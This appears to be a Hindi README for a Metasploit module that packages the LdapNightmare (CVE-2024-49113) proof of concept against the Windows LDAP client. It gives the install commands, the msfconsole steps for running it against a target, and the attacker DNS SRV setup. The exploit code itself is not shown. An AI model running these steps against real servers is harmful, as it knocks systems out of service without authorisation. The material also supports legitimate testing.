
SafeBreaches CVE-2024-49113 POC(LdapNightmare) Metasploit में एकीकृत
SafeBreaches CVE-2024-49113 POC(LdapNightmare) को Metasploit में एकीकृत किया गया
यह मॉड्यूल CVE-2024-49113 को लागू करता है, जो Windows LDAP क्लाइंट में एक गंभीर कमजोरी है जो सिस्टम अस्थिरता का कारण बन सकती है। यह मॉड्यूल Metasploit Framework के साथ एकीकृत होता है, जो इस कमजोरी के विरुद्ध सिस्टम की लचीलापन का परीक्षण करने का एक विश्वसनीय तरीका प्रदान करता है।
ldaptor
impacket
आवश्यक Python पैकेज स्थापित करें:
pip install -r requirements.txt
मॉड्यूल को अपने Metasploit मॉड्यूल निर्देशिका में रखें:
cp ldapnightmare.py /path/to/metasploit/modules/auxiliary/dos/windows/ldap/
सुनिश्चित करें कि मॉड्यूल निष्पादन योग्य है:
chmod +x ldapnightmare.py
msfconsole प्रारंभ करें:
msfconsole
मॉड्यूल लोड करें और कॉन्फ़िगर करें:
use auxiliary/dos/windows/ldap/ldapnightmare
set RHOSTS target_ip
set RPORT 49664
set LPORT 389
set DOMAINNAME yourdomain.com
run
RHOSTS - लक्ष्य पता (आवश्यक)RPORT - RPC के लिए लक्ष्य पोर्ट (डिफ़ॉल्ट: 49664)LPORT - LDAP सर्वर के लिए स्थानीय पोर्ट (डिफ़ॉल्ट: 389)DOMAINNAME - हमलावर का डोमेन नाम (आवश्यक)। इस डोमेन में विशिष्ट DNS SRV रिकॉर्ड कॉन्फ़िगर होने चाहिए (नीचे डोमेन कॉन्फ़िगरेशन देखें)ACCOUNT - लक्ष्य खाता नाम (डिफ़ॉल्ट: Administrator)SITENAME - लक्ष्य साइट नाम (डिफ़ॉल्ट: खाली)DOMAINNAME पैरामीटर के लिए विशिष्ट DNS SRV रिकॉर्ड कॉन्फ़िगर किए जाने आवश्यक हैं। डोमेन के अंतर्गत दो SRV रिकॉर्ड होने चाहिए:
ldap.tcp.dc._msdcs.domain_name → listen_port attacker's_machine_hostnameldap.tcp.default-first-site-name._sites.dc._msdcs.domain_name → listen_port attacker's_machine_hostnameमहत्वपूर्ण नोट: हमलावर की मशीन का होस्टनाम तभी काम करेगा जब पीड़ित सर्वर इसे NBNS का उपयोग करके हल कर सके। वैकल्पिक रूप से, आप होस्टनाम को एक डोमेन नाम से बदल सकते हैं जो आपके LDAP सर्वर के IP पते की ओर इंगित करता है।
मॉड्यूल तीन मुख्य चरणों में काम करता है:
यह मॉड्यूल केवल अधिकृत सुरक्षा परीक्षण और अनुसंधान उद्देश्यों के लिए है। उपयोगकर्ताओं को उन सिस्टमों का परीक्षण करने से पहले उचित प्राधिकरण प्राप्त करना होगा जिनके वे मालिक नहीं हैं या जिनके परीक्षण की अनुमति नहीं है।
यह मॉड्यूल BSD 3-Clause License के तहत जारी किया गया है।
इस कार्य में निम्नलिखित से लिया गया कोड शामिल है:
पूर्ण लाइसेंस पाठ LICENSES फ़ाइल में पाए जा सकते हैं।